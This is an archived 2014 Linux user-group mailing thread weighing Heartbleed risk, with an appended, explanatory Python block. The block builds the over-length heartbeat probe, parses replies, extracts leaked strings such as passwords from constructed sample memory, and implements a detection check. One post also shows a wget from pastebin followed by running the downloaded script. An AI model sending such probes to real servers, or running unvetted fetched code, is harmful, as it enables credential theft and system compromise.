[kwlug-disc] Heartbleed affected sites

unsolicited unsolicited at swiz.ca
Sat Apr 12 04:29:15 EDT 2014


That's over simplistic.

You can't extract a password that isn't there.

*IF* it is even in the packet you get.

*IF* it was being exploited at the time.

*IF* you are of interest to them.

*IF* they are interested in doing damage to that provider of services.

Lot of IFs. Lot of FUD.

What's being protected?

Will you know?

Will you care?

Not saying that, now that the exploit is known, they wouldn't run with it.

But patching is simplistic.

I take your point about SSL keys - IF it was in the data returned.

But with properly isolated systems, it should only be the front end 
impacted. On the assumption that nobody inside your firewall is 
exploiting it.

Lots of IFs all around.

But I take your point.


On 14-04-11 05:44 PM, Bob Jonkman wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> If your router is accessible from the WAN port via http then you have
> more urgent problems than Heartbleed.
>
> If a site has both http and https then there's no (new) vulnerability
> with http, but a Heartbleed attack on https can still extract
> passwords and other info.
>
> To extract a password from an http session a bad guy needs to be a
> man-in-the-middle, or sniffing the network (remember Firesheep?). To
> extract a password with Heartbleed an attacker only has to initiate an
> https session.
>
> - --Bob.
>
>
>
> On 14-04-11 05:35 PM, Khalid Baheyeldin wrote:
>> But, wouldn't Heartbleed be an issue only if you use SSL on the
>> site? For example, if you have OpenWRT/Tomato/DD-WRT and are logging
>> in via http (not https), then there is no exploit via OpenSSL?
>>
>>
>> On Fri, Apr 11, 2014 at 3:26 PM, Bob Jonkman <bjonkman at sobac.com>
>> wrote:
>>
>> If you're using a tool to check for Heartbleed vulnerabilities, be
>> sure to check the Web interface on your router and/or modem as
>> well.
>>
>> I'm not sure if router vendors are on top of this, but according
>> to ssltest.py my Tomato/MLPPP Version 1.25-mp3alpha6 (from
>> http://fixppp.org ) is not vulnerable, nor my Thomson Speedtouch
>> modem with firmware 6.1.0.5
>>
>> Also, somebody asked me how safe these vulnerability checking
>> tools are, especially the online and Javascript-based ones. What's
>> to say they're not merely displaying "all is well", and actually
>> compiling a list of vulnerable sites for later exploitation?
>>
>> --Bob.
>>
>>
>> On 14-04-08 12:06 PM, Khalid Baheyeldin wrote:
>>>>> You can use this python tool ssltest.py to check if your
>>>>> servers are vulnerable:
>>>>>
>>>>> $ wget -O ssltest.py "http://pastebin.com/raw.php?i=WmxzjkXJ"
>>>>> $ python ssltest.py example.com
>>
>>
>> On 14-04-11 10:51 AM, CrankyOldBugger wrote:
>>>>> Mashable has a list going of sites affected by Heartbleed:
>>>>>
>>>>> http://mashable.com/2014/04/09/heartbleed-bug-websites-affected/
>>>>>
>>>>>
>>>>>
>>>>> Don't forget to add Canada Revenue (and most other government
>>>>> sites) to your list of passwords to change!
>>
>>
>>
>> Bob Jonkman <bjonkman at sobac.com>          Phone: +1-519-669-0388
>> SOBAC Microcomputer Services             http://sobac.com/sobac/
>> http://bob.jonkman.ca/blogs/    http://sn.jonkman.ca/bobjonkman/
>> Software   ---   Office & Business Automation   ---   Consulting
>> GnuPG Fngrprnt:04F7 742B 8F54 C40A E115 26C2 B912 89B0 D2CC E5EA
>>
>>>
>>>
>>> _______________________________________________ kwlug-disc
>>> mailing list kwlug-disc at kwlug.org
>>> http://kwlug.org/mailman/listinfo/kwlug-disc_kwlug.org
>>>
>>
>>
>>
>>
>>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.14 (GNU/Linux)
> Comment: Ensure confidentiality, authenticity, non-repudiability
>
> iEYEARECAAYFAlNIYh8ACgkQuRKJsNLM5erCjgCfZAuLyG8v83bORUxPxTvs14m+
> r8kAoInhKmR99uQBN2cIt+2KY3xq4KMl
> =6dTX
> -----END PGP SIGNATURE-----
>
>
>
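Added illustration for this thread (not ssltest.py and not code posted by anyone above) of the exchange Bob describes: the attacker needs nothing but a TLS session, because the bug is in how the server handles a heartbeat record that declares a larger payload than it actually carries. The block builds that probe, applies the bounds check the OpenSSL fix added (which doubles as an on-the-wire detection rule for the "will you know?" question), classifies a server's reply, and runs a strings-style sweep over the returned bytes to show concretely that a credential only comes out if it happened to be in the echoed memory. The reply bytes and the "heap" contents are constructed for the example; no network is touched.

```python
"""Heartbleed (CVE-2014-0160): probe construction, reply classification, wire detection.

Added example for this thread; it is not ssltest.py and not code from any poster.
All byte strings below are constructed, so it runs offline.
"""
import struct

TLS_HEARTBEAT = 0x18          # TLS ContentType for the heartbeat extension (RFC 6520)
TLS_ALERT = 0x15
HB_REQUEST, HB_RESPONSE = 0x01, 0x02
HB_MIN_PADDING = 16           # RFC 6520 minimum padding length


def build_heartbeat_probe(claimed_len=0x4000, version=(3, 2)):
    """Heartbeat request whose declared payload_length exceeds the bytes sent:
    the record carries only the 3-byte heartbeat header, no payload, no padding.
    A fixed OpenSSL silently discards it; a vulnerable one echoes claimed_len bytes."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len)
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(body)) + body


def parse_records(data):
    """Split raw bytes into (content_type, body) TLS records. A record whose
    header promises more bytes than are present is returned truncated."""
    records, i = [], 0
    while i + 5 <= len(data):
        ctype, _vmaj, _vmin, length = struct.unpack("!BBBH", data[i:i + 5])
        records.append((ctype, data[i + 5:i + 5 + length]))
        i += 5 + length
    return records


def heartbeat_is_malformed(body):
    """The bounds check the OpenSSL fix added: type(1) + length(2) + payload +
    padding(16) must fit inside the record. True means the record over-claims
    its payload; applied to client->server heartbeat records it flags a probe."""
    if len(body) < 3:
        return True
    _hb_type, payload_len = struct.unpack("!BH", body[:3])
    return 1 + 2 + payload_len + HB_MIN_PADDING > len(body)


def classify_response(data, claimed_len):
    """Decide from the bytes a server sent back after the probe whether it
    leaked memory. Returns (verdict, leaked_bytes)."""
    for ctype, body in parse_records(data):
        if ctype == TLS_HEARTBEAT and len(body) > 3 and body[0] == HB_RESPONSE:
            # Response echoes our claimed length, then that many bytes of server memory.
            return "vulnerable", body[3:3 + claimed_len]
        if ctype == TLS_ALERT:
            return "not vulnerable (alert)", b""
    return "not vulnerable (no heartbeat response)", b""


def printable_runs(blob, min_len=6):
    """strings(1)-style sweep of a leaked buffer: a password is recoverable only
    if it happened to sit in the memory that was echoed back."""
    runs, cur = [], bytearray()
    for b in blob:
        if 0x20 <= b < 0x7F:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            runs.append(cur.decode("ascii"))
        cur = bytearray()
    if len(cur) >= min_len:
        runs.append(cur.decode("ascii"))
    return runs


# Constructed sample traffic: one vulnerable reply, one patched server's (silent) reply.
CLAIMED = 0x4000
PROBE = build_heartbeat_probe(CLAIMED)
# Hypothetical heap contents for the example: a recently handled login POST.
_fake_heap = (b"\x00" * 40
              + b"POST /login HTTP/1.1\r\nCookie: session=abc123\r\n\r\n"
              + b"user=alice&password=hunter2"
              + b"\x00" * CLAIMED)[:CLAIMED]
VULNERABLE_REPLY = (struct.pack("!BBBH", TLS_HEARTBEAT, 3, 2, 3 + CLAIMED + HB_MIN_PADDING)
                    + struct.pack("!BH", HB_RESPONSE, CLAIMED)
                    + _fake_heap + b"\x00" * HB_MIN_PADDING)
PATCHED_REPLY = b""   # fixed OpenSSL drops the malformed request; nothing comes back

if __name__ == "__main__":
    print("probe:", PROBE.hex())
    print("probe over-claims payload:", heartbeat_is_malformed(parse_records(PROBE)[0][1]))
    verdict, leaked = classify_response(VULNERABLE_REPLY, CLAIMED)
    print(verdict, printable_runs(leaked))
    print(classify_response(PATCHED_REPLY, CLAIMED)[0])
```

Against a live host the probe is only meaningful after a ClientHello that advertises the heartbeat extension and the server's ServerHelloDone; ssltest.py does that handshake first and then sends the same 8-byte record. The detection side is the interesting part for defenders: the over-claim check is exactly the condition the patched server enforces, so an IDS applying it to inbound 0x18 records sees the probe whether or not the host behind it is patched.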